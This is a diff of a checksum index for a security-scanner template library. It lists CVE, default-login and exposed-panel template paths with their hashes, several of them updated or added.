http/cves/2015/CVE-2015-1880.yaml:ca7f1f3a9107efcffa188c57817a30b92f9386c3
@ -784,7 +784,7 @@ http/cves/2017/CVE-2017-15715.yaml:3d2ca656232347c4f846cfb00b291863dfebebd0
http/cves/2017/CVE-2017-15944.yaml:d42ece41eb2db015f9cdd7d363c063f7c6d63ac7
http/cves/2017/CVE-2017-16806.yaml:b831f0424485345b082a03671f70a0ac5a517a52
http/cves/2017/CVE-2017-16877.yaml:9d50bcec4aa8d97a41a0a9a37dbde0d7c9413078
http/cves/2017/CVE-2017-16894.yaml:624972793484ce688ee19d61a81dfdb1a8e087fb
http/cves/2017/CVE-2017-16894.yaml:31daf5cda9b826809841860f69f90670223337b2
http/cves/2017/CVE-2017-17043.yaml:2d6f3ecd61972cfa1d0b964e8c624d08f1890aa3
http/cves/2017/CVE-2017-17059.yaml:20737e85c00e10d20cdb0f5f2c8b331e1de3d017
http/cves/2017/CVE-2017-17451.yaml:f96e9f95074b6dc5634afc945d4a86781450c10d
@ -958,7 +958,7 @@ http/cves/2018/CVE-2018-7700.yaml:a1a773df8ccd5da363d69a918584a3aa5677a61e
http/cves/2018/CVE-2018-7719.yaml:0f2005d1cbb73e1927db8d7ddef3593654b8b5fb
http/cves/2018/CVE-2018-8006.yaml:5c575c3e64235d3e9d34ac4dacf9d531af73eb5d
http/cves/2018/CVE-2018-8033.yaml:d52e86e1b60949b6ea7115e2f0a744cfef83f692
http/cves/2018/CVE-2018-8715.yaml:8c65cdf36caa75e9da398a66454ab76347797722
http/cves/2018/CVE-2018-8715.yaml:5539a2bcfa36c3ebf9339c6c13af71dc0e18310e
http/cves/2018/CVE-2018-8719.yaml:1c0479c91dc4b3d7947a4ff7d2f8e1cd74d0bb2a
http/cves/2018/CVE-2018-8727.yaml:c5a1f5e9fcd2c752293dfb7b6fb1327d1ea6aa60
http/cves/2018/CVE-2018-8770.yaml:2c7fb76d644bd4deb8379d60492a6c23e1dc5b25
@ -1601,7 +1601,7 @@ http/cves/2021/CVE-2021-34621.yaml:8188ba1dc7da2d8c19d43bb5d1f83f89a2e112c0
http/cves/2021/CVE-2021-34640.yaml:9fa376348dd20d9f5185209b5eebfe429c1405ee
http/cves/2021/CVE-2021-34643.yaml:a2f8e32b2799f57b2f8ff1191fb181d27a64b026
http/cves/2021/CVE-2021-34805.yaml:2cb2f8eb6b783c25f89b0bd4bfac7f3f2b140e3d
http/cves/2021/CVE-2021-35250.yaml:43158a19ca2dac8aa9bbff9bc74d7740d8862e05
http/cves/2021/CVE-2021-35250.yaml:b784da72fcb4f878846583b7a9a8c3a6781b5f9e
http/cves/2021/CVE-2021-35265.yaml:a829938d41ad29f7fa48c57090acf796669aa02c
http/cves/2021/CVE-2021-35336.yaml:ffc28b6881beed9c4a11141d5bc585230cfa3db7
http/cves/2021/CVE-2021-35380.yaml:e81b6e4051a8edc6c727ee1bf2ac23e8b3c9a9be
@ -1784,7 +1784,7 @@ http/cves/2022/CVE-2022-0747.yaml:3a01d028f8942422f3bb5f87570e1dbf3c8716a6
http/cves/2022/CVE-2022-0760.yaml:2087d0e0363de0a24ecfda783ef2da610bbee0fa
http/cves/2022/CVE-2022-0769.yaml:bba3c1869cc69f2d257a7cbc1ecf88a970f6c748
http/cves/2022/CVE-2022-0773.yaml:47a5bc5482e5a7417a2ba001e2337d1553df796a
http/cves/2022/CVE-2022-0776.yaml:d08d120c86f2acf1ad96ffbd7ab17f1850e97797
http/cves/2022/CVE-2022-0776.yaml:8a6f3bb3ab4a38013557885af61f678bf8f2c1c1
http/cves/2022/CVE-2022-0781.yaml:35b5e08d0624f2c6d0ece0ffc178d0fdf8ab3907
http/cves/2022/CVE-2022-0784.yaml:e88e35a5ee79aabc840423d751098f8ef3606304
http/cves/2022/CVE-2022-0785.yaml:57e43ed2e8ab0a7d44072685ad038cb53a884b54
@ -2112,6 +2112,8 @@ http/cves/2023/CVE-2023-0942.yaml:909ef82b6ebfdd2d0f666b7831a5b80d14357404
http/cves/2023/CVE-2023-0968.yaml:9d3dcc64171b1e94861ae23dedcec3d5847ead0c
http/cves/2023/CVE-2023-1080.yaml:745fdda182f12f56681a62f278e089fdffe89e97
http/cves/2023/CVE-2023-1177.yaml:af550c65690ef4a08f87d273e211411d85d45aaf
http/cves/2023/CVE-2023-1671.yaml:eabc674db31a6ce9ed04210a22437fcf0897c763
http/cves/2023/CVE-2023-20864.yaml:c461cf54a367dc6fe9e454d679aedfeab2a9845e
http/cves/2023/CVE-2023-22620.yaml:1aea185a7bdbf34e9e2b17fc7b8d5c2b63bbc384
http/cves/2023/CVE-2023-22897.yaml:cd37b7f41798a615db00c4ef8ee111aadbfaba88
http/cves/2023/CVE-2023-23488.yaml:3351d083f957df4a0f12fc8254d0d5c25f8c07f0
@ -2125,24 +2127,26 @@ http/cves/2023/CVE-2023-24367.yaml:c7708205054190fb3728bc1a21be805934a4fd9f
http/cves/2023/CVE-2023-24657.yaml:12cb50ffff7bde3a3e4a6987d00b5d3f552ced4b
http/cves/2023/CVE-2023-24733.yaml:cf3005c4cb1e155c2d6a849cd9e0dc778a9655c1
http/cves/2023/CVE-2023-24735.yaml:268b8124da16529beff4aef6be58fb56a81a8d00
http/cves/2023/CVE-2023-24737.yaml:436bdec4adea2dac25d3993f57d5fbcd9fda0f66
http/cves/2023/CVE-2023-24737.yaml:e4eb3ccf513522063b07fbb4c6bad0fb51aeb46d
http/cves/2023/CVE-2023-26255.yaml:53c1b9ba41c8a19027f763f1e00ffd82f83df462
http/cves/2023/CVE-2023-26256.yaml:2361ef6720ae1ada2022db6396f1147f31d46527
http/cves/2023/CVE-2023-27008.yaml:f0a30703c15a6c39e0da8531fe0565f4d1ea25e3
http/cves/2023/CVE-2023-27159.yaml:25fa470e51ca120d4922337dba43b9b6af23c19e
http/cves/2023/CVE-2023-27159.yaml:e6b9cc24cfb6c26d925784825f19a7549d2e1d4a
http/cves/2023/CVE-2023-27179.yaml:3c5ae13a5a9d3e04bb49d1de799ff8009dd69311
http/cves/2023/CVE-2023-27292.yaml:88d58a70bf7a4b5f596e3cd9e7eb80ba2b429f6a
http/cves/2023/CVE-2023-27350.yaml:df141d419d9a2c732ec20b79b362301dd322f62b
http/cves/2023/CVE-2023-27524.yaml:c44d65c45d0f66ba5a288b92474115bf239afde5
http/cves/2023/CVE-2023-27587.yaml:948a890384662f44c000be013462636ddcc9d991
http/cves/2023/CVE-2023-28343.yaml:f476073191867ed90c2c609aac34f9c06e4aa9d9
http/cves/2023/CVE-2023-28432.yaml:8874d4e16b0920f8ccaecd163914d787de16c96e
http/cves/2023/CVE-2023-29084.yaml:d5cacdd7a1bfa5672a6f6ec1d6c8a6899c82a5f1
http/cves/2023/CVE-2023-29489.yaml:ac7fcb495a3571fc16976cc8324537c191fcc470
http/cves/2023/CVE-2023-29922.yaml:49267c8db50815b31e4bd3e94831cab13f616829
http/default-logins/3com/3com-nj2000-default-login.yaml:3c46b5aafc39a5bab5ffebf26f6ba0cf97019d1f
http/default-logins/UCMDB/ucmdb-default-login.yaml:4cc3a46850695b0e5a8ea99c5c3af420adc2af3f
http/default-logins/abb/cs141-default-login.yaml:9b0bd5a3888b1501b9e91359f4d9e0c1f01a1405
http/default-logins/activemq/activemq-default-login.yaml:c6de07993c75d937675124a3cce1591b1026e4e7
http/default-logins/adminer-default-login.yaml:90aeddcd93768ab7362a8096a66194b256f231be
http/default-logins/adminer-default-login.yaml:56a67a89334a4c70927d73fe8337a7e69e5ab460
http/default-logins/aem/aem-default-login.yaml:206e8c303f009cf79cc18103677f460052f97f7f
http/default-logins/aem/aem-felix-console.yaml:424f1ae07b00114ddb01bf1eb4dca5f8884a5c1f
http/default-logins/alibaba/canal-default-login.yaml:74ee001c4077f2e863c837c41ed2c7c444e037b6
@ -2172,7 +2176,7 @@ http/default-logins/dell/emcecom-default-login.yaml:435e630056eba46603a71c49b4c0
http/default-logins/digitalrebar/digitalrebar-default-login.yaml:a48842f9b9e053ea824fdecf6e9720e0e53e701d
http/default-logins/druid/druid-default-login.yaml:959f7aa2ecf8af09dfeb47cd39f8516670b06ea8
http/default-logins/dvwa/dvwa-default-login.yaml:3247673ad0548181c4514cb2f067db9f8bfd00b4
http/default-logins/empire/empirec2-default-login.yaml:5ecf653baf0a7164293e2ae5141c7bd52bcb39cd
http/default-logins/empire/empirec2-default-login.yaml:26f7799a3bc4145495ba01d14e4bafbd0a4c7a98
http/default-logins/emqx/emqx-default-login.yaml:a2f88ebfd9a8745e9f8ac744cef8fc5e7c91f22a
http/default-logins/exacqvision/exacqvision-default-login.yaml:fe98980ed55e72abf6a4975deb967bc74030b73d
http/default-logins/flir/flir-default-login.yaml:5953a1808b8eaeeb40ff251829f5fa883b39715e
@ -2194,7 +2198,7 @@ http/default-logins/ibm/ibm-mqseries-default-login.yaml:1fcb187a21c1bc4d142b67aa
http/default-logins/ibm/ibm-storage-default-credential.yaml:466ef71a1409311179e9e98286ff4bf38e6ccc6b
http/default-logins/idemia/idemia-biometrics-default-login.yaml:ff82498d4af810cf738bfb1fe6b61793acc30812
http/default-logins/iptime/iptime-default-login.yaml:dae30bd9b6d42dfa3d151e5757ddd02b83be5ae9
http/default-logins/jboss/jboss-jbpm-default-login.yaml:85dd7c943399302c48b048157c05515376fdf054
http/default-logins/jboss/jboss-jbpm-default-login.yaml:7ee99e11bafadbdb3fd91430a81a26d4a816bec7
http/default-logins/jboss/jmx-default-login.yaml:6341d550d2b1caaa5849e66a09fe8bf11b5a93d8
http/default-logins/jenkins/jenkins-default.yaml:40b761481b820a7c69debf07363cc0b7eebf4e13
http/default-logins/jinher/jinher-oa-default-login.yaml:f4adbacb058f9a6cfdcc5e65cd6f8972201b7657
@ -2202,13 +2206,13 @@ http/default-logins/jupyterhub/jupyterhub-default-login.yaml:80440bb151fea11c763
http/default-logins/kanboard-default-login.yaml:0fe10d43398f46a1936316feee89e6436dc3e1d4
http/default-logins/kettle/kettle-default-login.yaml:3a9a0a072121cfd59c02acdb7a3a3cf9b5e5f295
http/default-logins/lutron/lutron-default-login.yaml:a9b18b6c9f90b323a5afd4d701361478bd755d7d
http/default-logins/magnolia-default-login.yaml:608fb58e1dfc92435e201c835df02d9e18d96965
http/default-logins/magnolia-default-login.yaml:24d00929d5878b856a4193cbcefbae3d0196dbe1
http/default-logins/mantisbt/mantisbt-default-credential.yaml:a41e5a0ce4d9b3f10278836e7245d4b90cd6f353
http/default-logins/minio/minio-default-login.yaml:92fde268a139a760325b5f90281a2686e18b4f25
http/default-logins/minio/minio-default-login.yaml:bce6936dd23cee3b158b3ef86cfbfbaab62d0ca9
http/default-logins/mobotix/mobotix-default-login.yaml:5d9fbb4f3747ec5ff7097852c013cd5c3bf460de
http/default-logins/mofi/mofi4500-default-login.yaml:9c72df35a609e1ea4c95c95e63eef632d753ce49
http/default-logins/nagios/nagios-default-login.yaml:d36e59c9ea84bca8c30be4f796541df663c86733
http/default-logins/nagios/nagiosxi-default-login.yaml:f8d97a87d958cc4b66f6de99bcd3de97647d2155
http/default-logins/nagios/nagiosxi-default-login.yaml:2eb10756fb18dba338fde8bfc26c9483a84a06a1
http/default-logins/netsus/netsus-default-login.yaml:6c2c50f3b5955eede125ab6cca43000be9f6ab06
http/default-logins/nexus/nexus-default-login.yaml:2578f570d8ce35eeea3af6b3c011825be162c751
http/default-logins/nps/nps-default-login.yaml:b418d99528772b0fe40f4d00909b193f9c17b72d
@ -2229,6 +2233,7 @@ http/default-logins/paloalto/panos-default-login.yaml:e3d4f9b309ac9ee7159a58c8a8
http/default-logins/panabit/panabit-default-login.yaml:21b20e7f56f31562258b097eb7b3dc0fa505cdd3
http/default-logins/pentaho/pentaho-default-login.yaml:619cfd43f184629a75b6d6a32b0c40e746ea3485
http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml:df67f8fcaf3cc75da96feca53f0e2420531e3af6
http/default-logins/powerjob-default-login.yaml:f44c4b7c3ab761507a6695dca3014c2090cb0f3e
http/default-logins/prtg/prtg-default-login.yaml:03c5b3fbeadadfaf76f81b5afefd84c008f90bae
http/default-logins/rabbitmq/rabbitmq-default-login.yaml:61d2270bde9043eb1748d8600e0e7497392b9899
http/default-logins/rainloop/rainloop-default-login.yaml:cbf0a2bedb0c3990f25e4a000da64ae4980a5b7d
@ -2250,7 +2255,7 @@ http/default-logins/supermicro/supermicro-default-login.yaml:8ac5f222e2caa55b71d
http/default-logins/szhe/szhe-default-login.yaml:4e41765f78d70bae75fa4994a6bb1b7aab20008e
http/default-logins/tiny-file-manager-default-login.yaml:9926b9e7dab41a2266ba2827e2e8b0c7362a848e
http/default-logins/tooljet/tooljet-default-login.yaml:3475b533ff4280cc8749b7881224d761de03ac23
http/default-logins/trassir/trassir-default-login.yaml:e17a0976b62ea22f309f13ab947a2384e8cbe106
http/default-logins/trassir/trassir-default-login.yaml:aedc36577d050894f8b69f9fae7d14d7fca13e7e
http/default-logins/versa/versa-default-login.yaml:0fed361310fb13b2aece2dc021dc52b7808ef833
http/default-logins/versa/versa-flexvnf-default-login.yaml:98f0e82136c9e31094ea64d1f0d6bfb78d6b60f8
http/default-logins/vidyo/vidyo-default-login.yaml:9bfe66b75d9a9cde03ee4b30f092cd222e3cbbac
@ -2311,7 +2316,7 @@ http/exposed-panels/apache/public-tomcat-manager.yaml:b723fc47b7b805b9eca6e08106
http/exposed-panels/apache-jmeter-dashboard.yaml:1f67ae69a07e06910deadd326aee5e5d5d315f39
http/exposed-panels/apiman-panel.yaml:581ac5d59e45c77398a03deb463b442aa8f2520b
http/exposed-panels/appsmith-web-login.yaml:ab41b19aad2f035da3efd2b2fa86999df88e53c4
http/exposed-panels/appwrite-panel.yaml:29b9bc67f9d60ef1f24a6fea08391bf6915fdc1f
http/exposed-panels/appwrite-panel.yaml:95dcdb8f4564e7afbb7a63deb641963262a2806a
http/exposed-panels/aptus-panel.yaml:a49f9a51633ed5722f8b176f0c1fbe2afaf95a89
http/exposed-panels/aqua-enterprise-panel.yaml:ece6d0665b4a5e66918235d6543b69258a12cd3a
http/exposed-panels/arcgis/arcgis-panel.yaml:fd000aa560dfa92eaf73425fdf1cb6a40892c919
@ -2321,7 +2326,7 @@ http/exposed-panels/arcgis/arcgis-tokens.yaml:47c78443dec12ecd5bd07ba4048f536f87
http/exposed-panels/archibus-webcentral-panel.yaml:ef928ddf6b27b9c8faed6866505d17c3f800223b
http/exposed-panels/argocd-login.yaml:92eceb0999e8359b14bef7c17cf2c9c36246a11f
http/exposed-panels/arris-modem-detect.yaml:e2aebc4ac0ffd96d486e5b4f696d262bf5ab18f6
http/exposed-panels/aspect-control-panel.yaml:daa40e0df5843aef84160faf5b991b8c79664821
http/exposed-panels/aspect-control-panel.yaml:09bb1660cf31be880441caca948693b1666c10a2
http/exposed-panels/asus-router-panel.yaml:87838b7f09e0fc96b18b9f6aef4210bf091844e2
http/exposed-panels/atlantis-detect.yaml:fa5c17b5fe074468b2c1c7073c43e83c1ed948f4
http/exposed-panels/atlassian-crowd-panel.yaml:78476adb038e3eb4e58ffa0c3a4500a7d2b52842
@ -2339,8 +2344,8 @@ http/exposed-panels/aws-opensearch-login.yaml:f78df8b7d61aefadff91514306acb09724
http/exposed-panels/axel-webserver.yaml:7f3b93c13c76c423dbe2a461bd125bf0f21094ce
http/exposed-panels/axigen-webadmin.yaml:bb7cb6021bee2f6853afdd6e5f61987bf9b45a84
http/exposed-panels/axigen-webmail.yaml:3ae38bb0d596ce489150d472fa47ea9566ecbf54
http/exposed-panels/axway-securetransport-panel.yaml:a7a397c0ed73ffee9f98372cc3ccbaee86ff6463
http/exposed-panels/axway-securetransport-webclient.yaml:fbd2c65383292c44f968682fef7a42891eb1283d
http/exposed-panels/axway-securetransport-panel.yaml:711a0d62f0e564488e021331b3753d9a12249f1e
http/exposed-panels/axway-securetransport-webclient.yaml:1d264f2d7991022eb3e70635853df89c2e7b130a
http/exposed-panels/azkaban-web-client.yaml:d29e882e15f688e116816a51bdf350eeebe6f86a
http/exposed-panels/backpack/backpack-admin-panel.yaml:ab78ec5e2ecff92c8df96cf38e0f1c34cb75d6ac
http/exposed-panels/barracuda-panel.yaml:a8a5e4c7f8328d89f21ab079e46dccb4b01d2f77
@ -2377,7 +2382,7 @@ http/exposed-panels/camunda-login-panel.yaml:8a36d6700d2d2613797e1e3ff6eb90f1e66
http/exposed-panels/cas-login.yaml:57f30b0ee83a80290926f748ddd69f142fe17be9
http/exposed-panels/casdoor-login.yaml:9b079094b0408a2a040e6fefcaf216525110328a
http/exposed-panels/casemanager-panel.yaml:649993806e91737558195f584af9804cb83b5a93
http/exposed-panels/caton-network-manager-system.yaml:9561921837ea4e657868d2bff93755677d56949c
http/exposed-panels/caton-network-manager-system.yaml:4560d7cfab4c8bad6b9b06df3cda7accd99b27f3
http/exposed-panels/ccm-detect.yaml:1fc05e835cb3e6b62f3671fe1475b6e961825e93
http/exposed-panels/centreon-panel.yaml:a801d4b8643d42f94a0a492e508421424ba3a267
http/exposed-panels/cerebro-panel.yaml:c85b15f82f76e9d2316f179f9300f34f2d60cc61
@ -2429,7 +2434,7 @@ http/exposed-panels/cortex-xsoar-login.yaml:b6262dfac65f9566df2faf77c74d81fdf6da
http/exposed-panels/couchdb-exposure.yaml:41aa4bfe3d93a02c64a965e9af0a3c512f712690
http/exposed-panels/couchdb-fauxton.yaml:d168286d1180279aca0e2c5f30adf08c390c8a6e
http/exposed-panels/cpanel-api-codes.yaml:9127bd64cbe0d4d14ca79dae29e9807ed8e77dcb
http/exposed-panels/craftcms-admin-panel.yaml:c4c52fbd234c44baa722bc79b58b8f0dd545e0cf
http/exposed-panels/craftcms-admin-panel.yaml:fc9b2b0a191c82b4ab3011210f56af903e793f48
http/exposed-panels/creatio-login-panel.yaml:49ef924029a0343113f934479057ac2944715308
http/exposed-panels/crush-ftp-login.yaml:74c85aa382a97d5f1b56b906e3b7f20d1cd2c6c7
http/exposed-panels/crxde-lite.yaml:a3999c0c15e5aeea0e02399250bf1b4e11dced9c
@ -2468,8 +2473,8 @@ http/exposed-panels/druid-console-exposure.yaml:42bd16021b800ca4363f9c973a437861
http/exposed-panels/druid-panel.yaml:d66befa994f210ecb0184b604fc9bba64198fd30
http/exposed-panels/drupal-login.yaml:bef8a8e4bc387ea39247dfb93d99b2a364662362
http/exposed-panels/dynamicweb-panel.yaml:473c28f936052a0d997a7c7d35ac89dd562f7480
http/exposed-panels/dynatrace-panel.yaml:ae953c66123ff9b268a876228f976385fddaa3c8
http/exposed-panels/dzzoffice/dzzoffice-install.yaml:cb684da1f14cb231f2a01b6cf78603ae4a0e1fd7
http/exposed-panels/dynatrace-panel.yaml:eb24aaf749a9a78c8872558541682a594527ff37
http/exposed-panels/dzzoffice/dzzoffice-install.yaml:d6ca209cd73fc31d4c0704b6cd024ded07a7c8e2
http/exposed-panels/dzzoffice/dzzoffice-panel.yaml:0b1f91113d5dd47a4262a5abe00f0f5bbb3ac3a3
http/exposed-panels/e-mobile-panel.yaml:5ff543414a04508de2dec8098ac5a68fa756ed6b
http/exposed-panels/eMerge-panel.yaml:0ee87e8c9c52e0f9806182a9ee6e25b59c2fd199
@ -2477,7 +2482,7 @@ http/exposed-panels/ecosys-command-center.yaml:ecdedf74967790fcfadb5e87bc24a1671
http/exposed-panels/edgeos-login.yaml:bfad390b4768e58f739b0a293d90f8d0f114732e
http/exposed-panels/eko-management-console-login.yaml:4c9596741a8f941fd45d6972d9b38cd18db3f653
http/exposed-panels/eko-software-update-panel.yaml:e6a546c3678116651ed0e55c9a400359aa84b576
http/exposed-panels/elemiz-network-manager.yaml:31a000c0293af35050bb17505fc36e17614316d8
http/exposed-panels/elemiz-network-manager.yaml:99dbf8c38488ff26a32dd1dcbdada4d997f19f95
http/exposed-panels/emby-panel.yaml:b730c98afcc75e9c8c322af0bcb01cf530ea5e47
http/exposed-panels/emerson-power-panel.yaml:af4c8627b46c910dd074478bc22afdbde49545c8
http/exposed-panels/emessage-panel.yaml:6110fa04c54c8afcd12d43399961c46c67d6a43f
@ -2491,8 +2496,8 @@ http/exposed-panels/epson-web-control-detect.yaml:4bbd166b4f8900c2080c354a1b42cc
http/exposed-panels/esphome-panel.yaml:43ce5a2b39c1527be79dbbe646bafe668ed84337
http/exposed-panels/esxi-system.yaml:db895896efc85e55d75a74ddaddf8e4e44539a88
http/exposed-panels/eventum-panel.yaml:2d08f2616b411ef4d64f15f9e73a71e7bf9815fa
http/exposed-panels/ewm-manager-panel.yaml:f648e3d970fcfbbfcdb209ca9e24e35d0e0aa04b
http/exposed-panels/exagrid-manager-panel.yaml:a1b08f7ac19678a12c7c373c25e335924aaaf123
http/exposed-panels/ewm-manager-panel.yaml:9bcdde47f4085f233203e2b250acf174977405ad
http/exposed-panels/exagrid-manager-panel.yaml:971d9920a29b8454dcc0532e161897353874f696
http/exposed-panels/exolis-engage-panel.yaml:b86572cb023e88f90b808fa237310e844140525f
http/exposed-panels/exposed-webalizer.yaml:b6a0d9228ac9f90b8a95676f295ea9cb1c1ef533
http/exposed-panels/extreme-netconfig-ui.yaml:d0ee368ce7daa79747733b134947d7050251037f
@ -2503,8 +2508,8 @@ http/exposed-panels/faraday-login.yaml:7ce3bad180f80ec6dc4e7cea6b9ea8b4be1c0ab4
http/exposed-panels/fastapi-docs.yaml:7d77868e4dcbdea34994b7df08f8b8c7a16f0066
http/exposed-panels/fastpanel-hosting-control-panel.yaml:fc78fda73dc96b9621795829f7159b88d17a08f5
http/exposed-panels/fatpipe-ipvpn-panel.yaml:28041f7ed6635be2e03d38b90629b1246ea8cbf4
http/exposed-panels/fatpipe-mpvpn-panel.yaml:6e2d3a08a79ede88e3f0eef5459638d142305464
http/exposed-panels/fatpipe-warp-panel.yaml:16ad648a6e2093c017e50ed403017f49626c777b
http/exposed-panels/fatpipe-mpvpn-panel.yaml:1ef4e666e33e77b7fddcc90eccd86a22066ee988
http/exposed-panels/fatpipe-warp-panel.yaml:8f5b94fd538cb1238cef253eb2683cfd5d1e891d
http/exposed-panels/fiori-launchpad.yaml:d5bd78780e165f59e2f8b6ab56bb92a66ffaa03f
http/exposed-panels/fiorilaunchpad-logon.yaml:d8f088bbf7bf65f7e32b97ac463fac10046543c9
http/exposed-panels/fireware-xtm-user-authentication.yaml:1a7da3eec82f43233df89a6b74c657c2a3d165ae
@ -2521,14 +2526,14 @@ http/exposed-panels/forti/fortiadc-panel.yaml:ffacd47e34c592d2609adc0accd8181ab9
http/exposed-panels/fortinet/fortiap-panel.yaml:b89faddf0c29a9e9a8fefb6031d72f782b383474
http/exposed-panels/fortinet/fortimail-panel.yaml:af230a1cb5e26c158941d772a5a8dae8badda957
http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml:847001926ae21a884e70a14d6301bf6d4761e7ab
http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml:59f0f35212e2bac0a16c75c833bf93d7a363ee7e
http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml:1d0592895d1457dd478585c989f10d087eee78ac
http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml:f9f485f454b1e1e567580a3a91a15d5e019e9f10
http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml:a3454863c0d83701af34ea78670145a9495db692
http/exposed-panels/fortinet/fortinet-panel.yaml:fd06e5f6af3aa8f7d45a34a721311af424b40e6f
http/exposed-panels/fortinet/fortios-management-panel.yaml:ef2d2911cf92e71d5d7afe55c1785d70fc1481ba
http/exposed-panels/fortinet/fortios-panel.yaml:df8f8b3d532545d7fa18d223a7de014c5880179b
http/exposed-panels/fortinet/fortitester-login-panel.yaml:45de47807695b703951cad07f47400775d94fee3
http/exposed-panels/fortinet/fortiweb-panel.yaml:ab7f6463e85a5c1955fe86b87f2062d7574f1eae
http/exposed-panels/freeipa-panel.yaml:44bd90270cec1a20c896dc56ead1d413bd693f91
http/exposed-panels/freeipa-panel.yaml:55b12b83caf6c49f31559168d0f3a2485943e150
http/exposed-panels/freepbx-administration-panel.yaml:8ae869dbd5f925f42a160f332a6e1bf68c7ae5b4
http/exposed-panels/froxlor-management-panel.yaml:776c3b5494bd0d648a679f7f2e75762e3b9627d6
http/exposed-panels/ftm-manager-panel.yaml:a5092e40d936b64ef45997bee3402d73d1d56a59
@ -2547,7 +2552,7 @@ http/exposed-panels/github-enterprise-detect.yaml:6a73db084afec75d80dae9a6722d9f
http/exposed-panels/gitlab-detect.yaml:3c927e3db2778e5a0c77fd0acb8f278c49a1782d
http/exposed-panels/globalprotect-panel.yaml:870dbc6863e2970707642fc0dd0ed557f0d60d2e
http/exposed-panels/glpi-panel.yaml:040f341a7be99b0fa7e2b8c49642cc10a8972338
http/exposed-panels/gnu-mailman.yaml:2b504c1d4ef2268d56ac881f9d20887f0d7799a6
http/exposed-panels/gnu-mailman.yaml:ad2214548ea0ff79b809718b6e1885de893ceef9
http/exposed-panels/go-anywhere-client.yaml:cc9233de19c9a380ed1b6a391c0f819c713f48f3
http/exposed-panels/goanywhere-mft-login.yaml:22e0692641b27c7ef8038d4b702c143343932a2d
http/exposed-panels/gocd-login.yaml:c1238dccdb3f0428c19bb404e7b012ac42d45c5a
@ -2559,16 +2564,16 @@ http/exposed-panels/gradle/gradle-enterprise-panel.yaml:510a69f10f4f281ba3a630bb
http/exposed-panels/grafana-detect.yaml:e0e9d531594709818813ed143e9ff5689f5bfaa2
http/exposed-panels/grails-database-admin-console.yaml:52da5cd9dc42cd00e57bddb2b5abe4e86bc24e48
http/exposed-panels/graphite-browser.yaml:6e139b618efe8c57864c800c932c93551c46e64b
http/exposed-panels/group-ib-panel.yaml:cc2f877ac14fcad8659d3dfdc15fc4aeab70c6bc
http/exposed-panels/gryphon-login.yaml:c204d15adfa383b4cee560aa898112cc3b2d8f65
http/exposed-panels/group-ib-panel.yaml:999f522fe76c5efed669f3067d53ca734d4f296b
http/exposed-panels/gryphon-login.yaml:531a77ad65025a4d881bf55f81c6f6aa69b00f09
http/exposed-panels/gyra-master-admin.yaml:39f8fdaaa828781b17e4cf92b39d92f99b3db78a
http/exposed-panels/h2console-panel.yaml:e17441f53a435db4d6846164ebafd51025e03f3c
http/exposed-panels/hadoop-exposure.yaml:2b07be5310200e389a2394c69a8e2c0828e75020
http/exposed-panels/hangfire-dashboard.yaml:b1d3b90c80b778dccdabf7869a402af40ee43c19
http/exposed-panels/harbor-panel.yaml:20e85b8bbd4593f79f43a5eb3efcf0a9e90b3ec9
http/exposed-panels/hashicorp-consul-agent.yaml:e74f8b20108d82fe850cbd658a6d68f7cb9eec11
http/exposed-panels/hashicorp-consul-agent.yaml:eb2f05de9c871ef46a1ee2f470e5c228ec46c475
http/exposed-panels/hashicorp-consul-webgui.yaml:ef9bbc5476ef8f1f9d6d05240dd3a5440b994923
http/exposed-panels/hestia-panel.yaml:693ab62474766941ea1264316da011a2a1ea235b
http/exposed-panels/hestia-panel.yaml:27a494250cfd6f8d57630dd51ff78098c60ddf83
http/exposed-panels/highmail-admin-panel.yaml:7cc469eac77ca28bf0c4db9c48c450fe81cc3dbb
http/exposed-panels/hitron-technologies.yaml:3614de80a2f6e3da4257dad8aae28d5a7c936c1f
http/exposed-panels/hivemanager-login-panel.yaml:8e076b2a170ce9e2b29eba688f31e2d8a7aea0ec
@ -2589,7 +2594,7 @@ http/exposed-panels/huawei-hg532e-panel.yaml:466e7efb61203924e08683765fe58a4b5e8
http/exposed-panels/hybris-administration-console.yaml:7d1ebe531c1271d4259fe514069967875545d9e0
http/exposed-panels/hydra-dashboard.yaml:9e0055d0642f2ae85f17e5886de58a955fb58e8f
http/exposed-panels/hypertest-dashboard.yaml:e3f4b8ee0dec7426968ad6a92516f3ec29822aa8
http/exposed-panels/i-mscp-panel.yaml:4b35a061bb791494be55ca9716bfa14eef1450ee
http/exposed-panels/i-mscp-panel.yaml:d004e7f7bb480e42d0dcb6e5e4d9efc78d4e83bb
http/exposed-panels/ibm/ibm-advanced-system-management.yaml:360a7441e22f7a70bdc27193296ba9f9248acaed
http/exposed-panels/ibm/ibm-maximo-login.yaml:2f906d43ce693f00c0f7f49b3eae5bdf593f9414
http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:c09cdb27d0faf798e12b5e41b176b2c8642c4947
@ -2623,9 +2628,9 @@ http/exposed-panels/jamf-login.yaml:b8d8f51e8e10b1e65e12f141695a9a99a207871d
http/exposed-panels/jamf-panel.yaml:a5b1ab765796a1fd2dce512650ca4ee0bf011779
http/exposed-panels/jamf-setup-assistant.yaml:eb9e428dbb3a1e24a891ce05f6767d48114633a9
http/exposed-panels/jaspersoft-panel.yaml:f47072a4a3a518570898a6c6bd9ae1efdc8741b9
http/exposed-panels/jboss/jboss-jbpm-admin.yaml:3832df4de23302f78e2702a3a155fe30af7a31cd
http/exposed-panels/jboss/jboss-jbpm-admin.yaml:bda3186b481c5b22b45c95cec74e4bd84f147c12
http/exposed-panels/jboss/jboss-juddi.yaml:adde4aed2d368029e245936f947112008b7d82ad
http/exposed-panels/jboss/jboss-soa-platform.yaml:cb89ae2bca47862a05157cf628294c69b8b8c79f
http/exposed-panels/jboss/jboss-soa-platform.yaml:c28b46a6a25647a08ba919937d7f268a2834efdc
http/exposed-panels/jboss/jmx-console.yaml:2bf6bb0d8576e747a8affbd286b0daf492ab7b61
http/exposed-panels/jboss/wildfly-panel.yaml:29f69d41f34a4db077632276c3647b5f7b62f81f
http/exposed-panels/jcms-panel.yaml:ebc42c203282db15030885d692de6b50d1c6c2fc
@ -2646,7 +2651,7 @@ http/exposed-panels/kafka-topics-ui.yaml:d88fe451a8c00c1a4c0b0aa3e0fd576d9c98f16
http/exposed-panels/kanboard-login.yaml:9a3e30d13041d3f64a265b6c49d1cfecf9ae256a
